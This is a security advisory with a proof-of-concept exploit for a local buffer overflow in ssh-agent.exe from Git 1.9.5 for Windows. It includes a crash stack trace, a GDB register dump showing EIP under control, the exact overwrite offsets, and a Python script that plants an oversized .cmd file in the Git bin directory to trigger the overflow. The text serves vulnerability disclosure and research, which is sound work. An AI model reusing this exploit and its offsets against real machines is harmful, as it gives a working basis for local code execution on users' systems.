Git 1.9.5 - 'ssh-agent.exe' Buffer Overflow (PoC)

'''
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-GIT-SSH-AGENT-BUFF-OVERFLOW.txt



Vendor:
================================
git-scm.com



Product:
================================
Git-1.9.5-preview20150319.exe
github.com/msysgit/msysgit/releases/tag/Git-1.9.5-preview20150319


Vulnerability Type:
===================
Buffer Overflow



CVE Reference:
==============
N/A



Vulnerability Details:
=========================
Git Windows SVN ssh-agent.exe is vulnerable to buffer overflow. Under cmd dir in Git there is
start-ssh-agent.cmd file used to invoke ssh-agent.exe. This is local attack vector in which if
the "start-ssh-agent.cmd" file is replaced with specially crafted malicious '.cmd' file we cause buffer overflow, code execution may become possible.

Fault module seems to be msys-1.0.dll

File Name: msys-1.0.dll
MD5: 39E779952FF35D1EB3F74B9C36739092
APIVersion: 0.46

Stack trace:
-------------
MSYS-1.0.12 Build:2012-07-05 14:56
Exception: STATUS_ACCESS_VIOLATION at eip=41414141
eax=FFFFFFFF ebx=0028FA3C ecx=680A4C3A edx=680A4C3A esi=0028FA2C edi=00001DAC
ebp=42424242 esp=0028F9B4 program=C:\Program Files (x86)\Git\bin\ssh-agent.exe
cs=0023 ds=002B es=002B fs=0053 gs=002B ss=002B


Payload of 944 bytes to cause seg fault:
@ 948 bytes we completely overwrite EBP register.
@ 972 bytes KABOOOOOOOOOOM! we control EIP.


Quick GDB dump...

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info r
eax            0xffffffff       -1
ecx            0x680a4c3a       1745505338
edx            0x680a4c3a       1745505338
ebx            0x28f90c 2685196
esp            0x28f884 0x28f884
ebp            0x41414141       0x41414141
esi            0x28f8fc 2685180
edi            0x2660   9824
eip            0x41414141       0x41414141
eflags         0x10246  [ PF ZF IF RF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x53     83
gs             0x2b     43



POC code(s):
===============

Python script below to create a malicious 'start-ssh-agent.cmd' file that will be renamed
to 'ssh_agent_hell.cmd' and moved to the Git/bin directory, once run will cause buffer overflow and overwrite EIP.

Save following as ssh-agent-eip.py or whatever, run the script to generate a new malicious '.cmd' file and run it!

'''

import struct,os,shutil

#Git ssh-agent.exe
#EIP overwrite at 972 bytes
#By hyp3rlinx
#======================================================

file="C:\\Program Files (x86)\\Git\\bin\\ssh_agent_hell"
payload="CALL ssh-agent.exe "

x=open(file,"w")

eip="A"*4
payload+="B"*968+eip
x.write(payload)
x.close()
src="C:\\Program Files (x86)\\Git\\bin\\"
shutil.move(file,file+".cmd")


print "Git ssh-agent.exe buffer overflow POC\n"
print "ssh_agent_hell.cmd file created!...\n"
print "by hyp3rlinx"
print "====================================\n"

'''
Disclosure Timeline:
=========================================================
Vendor Notification:  August 10, 2015
Sept 26, 2015  : Public Disclosure




Exploitation Technique:
=======================
Local



Description:
==========================================================
Vulnerable Product:     [+]  Git-1.9.5-preview20150319.exe



===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by hyp3rlinx
'''